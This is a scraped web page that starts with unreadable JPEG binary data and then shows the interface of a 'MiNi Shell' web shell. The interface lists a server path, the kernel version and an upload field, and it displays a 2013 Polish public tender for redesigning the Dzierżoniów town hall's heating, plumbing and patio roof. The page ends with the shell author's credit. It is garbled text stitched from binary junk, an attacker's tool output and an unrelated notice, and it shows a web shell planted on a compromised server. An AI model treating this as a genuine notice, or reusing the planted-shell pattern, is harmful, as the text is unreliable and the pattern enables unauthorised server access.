JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130521/82993-N-2013.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie dokumentacji projektowej dla budynku Ratusza w zakresie: przebudowy instalacji centralnego ogrzewania, przebudowy węzła cieplnego wraz ze sterowaniem i automatyką, przebudowy instalacji wod. - kan. w toaletach i WC,  pomieszczeniach socjalnych i restauracji, wykonania instalacji c.w.u. wraz z cyrkulacją w tym także do pomieszczeń biblioteki, remontu toalet i WC oraz malowania pomieszczeń, w których będą prowadzone instalacje, wykonania przyłączy sanitarnych, wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową, remontu pomieszczeń Centrum</b><br>
<b>Numer ogłoszenia: 82993 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dla budynku Ratusza w zakresie: przebudowy instalacji centralnego ogrzewania, przebudowy węzła cieplnego wraz ze sterowaniem i automatyką, przebudowy instalacji wod. - kan. w toaletach i WC,  pomieszczeniach socjalnych i restauracji, wykonania instalacji c.w.u. wraz z cyrkulacją w tym także do pomieszczeń biblioteki, remontu toalet i WC oraz malowania pomieszczeń, w których będą prowadzone instalacje, wykonania przyłączy sanitarnych, wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową, remontu pomieszczeń Centrum.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres rzeczowy przedmiotu zamówienia obejmuje wykonanie dokumentacji projektowej dla budynku Ratusza w zakresie: przebudowy instalacji centralnego ogrzewania, przebudowy węzła cieplnego wraz ze sterowaniem i automatyką, przebudowy instalacji wod. - kan.  w toaletach i WC,  pomieszczeniach socjalnych i restauracji, wykonania instalacji c.w.u. wraz z cyrkulacją w tym także do pomieszczeń biblioteki; remontu toalet i WC oraz malowania pomieszczeń, w których będą prowadzone instalacje; wykonania przyłączy sanitarnych, wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową, remontu pomieszczeń Centrum Informacji Turystycznej. 
2.Dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót budowlanych muszą zostać wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004r., Nr 202, poz. 2072 z późn.zm.) w zakresie branż: konstrukcyjno-budowlanej, instalacyjnej i elektrycznej. 
3.Zakres rzeczowy przedmiotu zamówienia obejmuje ponadto:
1)uzyskanie decyzji o pozwoleniu na budowę oraz wszelkich innych decyzji wymaganych prawem wraz z wszelkimi wymaganymi uzgodnieniami, w tym uzyskanie pozwolenia od Dolnośląskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie prac w obiekcie zabytkowym,
2)wykonanie przedmiarów robót oraz kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 18.05.2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych o planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004 r., Nr 130, poz. 1389),
3)wykonanie wszelkich niezbędnych opracowań (w tym opinii i ekspertyz) wymaganych obowiązującym prawem warunkujących uzyskanie decyzji o pozwoleniu na budowę, 
4)uzupełnienie posiadanych przez Urząd inwentaryzacji budynku i instalacji C.O. dla potrzeb wykonania przedmiotu umowy - 1 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
5)uzyskanie mapy sytuacyjno - wysokościowej dla celów projektowych,
6)przebudowę węzła cieplnego uzgodnić z Zakładem Energetyki Cieplnej w Dzierżoniowie przy ul. Złotej 11,
7)uzyskanie warunków przyłączenia od dostawców mediów.
4.Należy sporządzić niezbędną ilość egzemplarzy projektu budowlanego w celu przekazania ich odpowiednim instytucjom oraz dostarczyć Zamawiającemu: 
1)projekt budowlany przebudowy instalacji C.O. i węzła cieplnego - 3 egzemplarze,
2)projekt budowlany sterowania i automatyki w węźle cieplnym - 3 egzemplarze,
3)projekt budowlany przebudowy instalacji wod. - kan. wraz z budową przyłączy  sanitarnych i wykonaniem c.w.u. - 3 egzemplarze,
4)projekt budowlany remontu toalet i WC oraz malowania pomieszczeń w których będą prowadzone instalacje - 3 egzemplarze, 
5)projekt aranżacji toalet i WC w budynku Urzędu - 3 egzemplarze,
6)projekt budowlany wykonania przeszklonego zadaszenia patio wejściowego na wieżę  ratuszową wraz z remontem pomieszczeń Centrum Informacji Turystycznej - 3  egzemplarze,
7)projekt wykonawczy przebudowy instalacji C.O. i węzła cieplnego - 3 egzemplarze,
8)projekt wykonawczy sterowania i automatyki w węźle cieplnym - 3 egzemplarze,
9)projekt wykonawczy przebudowy instalacji wod. - kan. wraz z budową przyłączy  sanitarnych i wykonaniem c.w.u. - 3 egzemplarze,
10)projekt wykonawczy wykonania przeszklonego zadaszenia patio wejściowego na wieżę  ratuszową wraz z remontem pomieszczeń Centrum Informacji Turystycznej - 3 egzemplarze,
11)przedmiary robót: przebudowy instalacji centralnego ogrzewania i i węzła cieplnego, sterowania i automatyki węzła cieplnego, przebudowy instalacji wod. - kan. w toaletach i WC, pomieszczeniach socjalnych i restauracji wraz z wykonaniem przyłączy sanitarnych i wykonanie c.w.u., remontu toalet i WC oraz malowania pomieszczeń, wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową i remontu  pomieszczeń Centrum Informacji Turystycznej  - po 1 egzemplarzu,
12)kosztorysy inwestorskie: przebudowy instalacji centralnego ogrzewania i węzła cieplnego, sterowania i automatyki węzła cieplnego; przebudowy instalacji wod. -  kan. w toaletach i WC,  pomieszczeniach socjalnych i restauracji wraz z  wykonaniem przyłączy sanitarnych oraz wykonaniem c.w.u.; remontu toalet i WC oraz malowania pomieszczeń, wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową i  remontu pomieszczeń Centrum Informacji Turystycznej  - po 1 egzemplarzu,
13)specyfikacje techniczne wykonania i odbioru robót budowlanych: przebudowy instalacji centralnego ogrzewania i węzła cieplnego, sterowania i automatyki węzła  cieplnego, przebudowy instalacji wod. - kan.  w  toaletach,  pomieszczeniach socjalnych i  restauracji wraz z wykonaniem przyłączy sanitarnych oraz wykonanie c.w.u., remontu  toalet i WC oraz malowanie pomieszczeń w których będą prowadzone instalacje,  wykonania przeszklonego zadaszenia patio wejściowego na wieżę ratuszową i  remontu pomieszczeń Centrum Informacji Turystycznej - po 3 egzemplarze.
Ponadto należy przekazać Zamawiającemu w w/w dokumentację w formie elektronicznej PDF w jednym egzemplarzu. 
5.Wytyczne jakie należy uwzględnić w dokumentacji projektowej:
Budynek Ratusza 2 piętrowy, z poddaszem użytkowym i strychem, częściowo podpiwniczony. W części podpiwniczonej znajduje się węzeł cieplny, restauracja i archiwum Urzędu. Powierzchnia użytkowa budynku wynosi  3 192 m2, w tym powierzchnia biblioteki 540,25m2. Kubatura obu budynków 20 048 m3.
Założenia ogólne do projektowania:
1)Przebudowa instalacji centralnego ogrzewania: 
1)wykorzystać istniejące grzejniki, zawory termostatyczne i instalacje z miedzi,
2)zaprojektować instalacje C.O. w pomieszczeniach poddasza nr 3.02-3.08 i nr 3.15-3.17  wskazanych na rysunku inwentaryzacji rzutu poddasza nr 5I, 
3)rozbudować instalację C.O. w pom. nr 0.33 CIT wskazanym na rysunku inwentaryzacji nr 2I,
4)ogrzewanie pomieszczeń nr 0.41 - 0.45 wskazanych na rysunku 2I należy przepiąć pod  obieg budynku Urzędu. Obecnie pomieszczenia te są podpięte pod zasilanie budynków mieszkalnych,
5)wydzielić instalację C.O.  dla restauracji (pom. od nr  -1.11 do -1.21 i pomieszczeń -1.32, - 1.33 wskazanych na rysunku inwentaryzacji 1I) z odrębnym zasilaniem z węzła,
6)przewidzieć roboty demontażowe i roboty budowlane towarzyszące.
2)Przebudowa węzła cieplnego:
Ciepło na cele grzewcze dostarczane jest z istniejącego węzła cieplnego wymiennikowego jednostopniowego. Rozdział ciepła realizowany jest za pomocą trzech obiegów grzewczych C.O. Pierwszy obieg pracuje dla potrzeb biblioteki, drugi obieg pracuje dla potrzeb budynków mieszkalnych a trzeci obieg pracuje dla potrzeb budynku Urzędu Miasta. W 2012r. Gmina wykonała nową instalację C.O. dla biblioteki, która została włączona do istniejącego rozdzielacza. Instalacja C.O. dla biblioteki posiada własną automatykę wraz ze sterowaniem.
Ponadto należy:
a)zapewnić odrębne opomiarowania instalacji C.O. dla Urzędu, restauracji, biblioteki 
i budynków mieszkalnych oraz c.w.u. dla Urzędu, restauracji i biblioteki,
b)przeprojektować sterowanie i automatykę węzła cieplnego z wydzieleniem jej dla obsługi  obiektów jak wyżej,
c)przebudować pozostałe niezbędne elementy w węźle cieplnym,
d)przewidzieć roboty demontażowe i budowlane towarzyszące.
3)Wymiana instalacji wod. - kan.:
1)wymienić instalację wod. - kan. w toaletach i WC, pomieszczeniach socjalnych, restauracji,  archiwum, węźle cieplnym,
2)zapewnić odrębne opomiarowanie zużycia wody dla restauracji,
3)wykonać przyłącza sanitarne,
4)dobrać separator tłuszczów do parametrów kuchni i przewidzieć jego lokalizację zgodnie z przepisami. Obecnie separator  wbudowany jest w posadzce, w korytarzu pom. nr -1.22,  rysunek nr 1I.
5)przewidzieć roboty demontażowe i budowlane towarzyszące,
6)przebudować wentylację mechaniczną w toaletach.
4)Wykonanie c.w.u.
Obecnie ciepła woda uzyskiwana jest z elektrycznych przepływowych podgrzewaczy wody i pojemnościowych podgrzewaczy wody.
1)wykonać c.w.u. wraz z cyrkulacją do toalet i WC, pomieszczeń socjalnych wskazanych  na rysunkach inwentaryzacji, restauracji oraz do  pomieszczeń biblioteki nr 1.29, 2.22, 2.23,
2)wykonać odrębne opomiarowanie dla restauracji,
3)wykonać odrębne opomiarowanie dla biblioteki,
4)wykonać odrębne opomiarowanie dla Urzędu,
5)przewidzieć roboty budowlane towarzyszące. 
5)Remont toalet i WC na podstawie projektu aranżacji tych pomieszczeń oraz  malowanie pomieszczeń, w których będą prowadzone instalacje.
6)Wykonanie przeszklonego zadaszenia patio wejściowego na wieżę ratuszową:
1)wykonać zadaszenie pomieszczenia nr 0.35 wskazanego na rysunku nr 2I wraz z jego odwodnieniem,
2)zadaszenie wykonać nad schodami stalowymi wejściowymi na wieżę pod rynną budynku głównego,
3)zapewnić możliwość wejścia na dach dla potrzeb jego wymycia i wyczyszczenia,
4)przebudować rurę spustową odprowadzającą wody opadowe z wieży poprzez jej  odprowadzenia po połaci dachu budynku Urzędu,
5)zdemontować zadaszenie z poliwęglanu nad schodami stalowymi wraz z zaprojektowaniem wykończenia konstrukcji stalowej schodów po zdemontowanym zadaszeniu,
6)wykonać malowanie schodów stalowych,
7)przebudować przeszklone zadaszenie i ściany w patio rekreacyjnym (nr 0.33),  
8)wykonać remont pomieszczenia nr 0.33 Centrum Informacji Turystycznej wraz z WC. 
7)Wydzielenie w korytarzu (nr 0.14) na parterze wiatrołapu przy wejściu do budynku  Urzędu zlokalizowanym pomiędzy Biurem dowodów osobistych (nr 0.13) a Biurem  obsługi klienta (nr 0.19).
6.Dokumentacja projektowa, opracowania kosztorysowe oraz specyfikacje techniczne wykonania i odbioru robót budowlanych powinny być zaopatrzone w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, iż są wykonane zgodnie z umową, obowiązującymi przepisami, uwzględniają wymagania art. 29 ust. 1, 2, 3 ustawy oraz, że zostają wydane w stanie kompletnym z punktu widzenia celu, któremu mają służyć oraz, że wszystkie egzemplarze dokumentacji są jednakowej treści. Wykaz opracowań oraz pisemne oświadczenie stanowią integralną część przedmiotu odbioru.
7.Wykonawca w opracowanym przez siebie projekcie budowlanym oraz specyfikacji technicznej wykonania i odbioru robót budowlanych winien odnieść się do zagadnień ochrony środowiska i bhp w aspekcie przyjętych rozwiązań architektoniczno-konstrukcyjnych, wyodrębniając powyższe w oddzielnym rozdziale. 
8.Wykonawca zobowiązany jest do ujęcia wszystkich robót w projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych, bowiem roboty budowlane będą realizowane na podstawie w/w opracowań. Przedmiar robót nie będzie stanowił podstawy realizacji robót budowlanych.
9.Dla potrzeb opracowania zakresu umownego Zamawiający pomocniczo przekazuje:
1)inwentaryzację budowlaną budynku Urzędu rys. od 1I do 10I,
2)inwentaryzację wewnętrznej instalacji C.O.,
3)rysunek rzutu piwnicy ze wskazaniem lokalizacji i wyglądu rozdzielacza - S1, 
4)rysunki sterowania instalacją C.O. dla biblioteki - E1 i E2,
5)3 zdjęcia patio wejściowego na wieżę.
Powyższa dokumentacja stanowi załącznik nr 9 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będą usługi tożsame z usługą stanowiącą przedmiot niniejszego zamówienia. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać w załączniku nr 4 do SIWZ wykonane główne usługi, w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów o wykonaniu:
1)minimum 2 projektów budowlanych obejmujących swym zakresem wykonanie instalacji centralnego ogrzewania w obiektach kubaturowych użyteczności publicznej,
2)minimum 2 projektów budowlanych obejmujących swym zakresem wykonanie instalacji wodno - kanalizacyjnej w obiektach użyteczności publicznej,
określających czy usługi te zostały wykonane należycie.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać w załączniku nr 5 do SIWZ osoby posiadające uprawnienia do projektowania w specjalności: architektonicznej, konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacji o podstawie dysponowania tymi osobami oraz złożenie oświadczenia, że osoby te posiadają wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ. 
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie terminu i wynagrodzenia - w przypadku wystąpienia zamówień uzupełniających, które mogą mieć wpływ na zmianę terminu wykonania i wynagrodzenia.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/#Y2xpY2tNZW51R2V0Q29udGVudHMoOTYyOCwxLDAp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com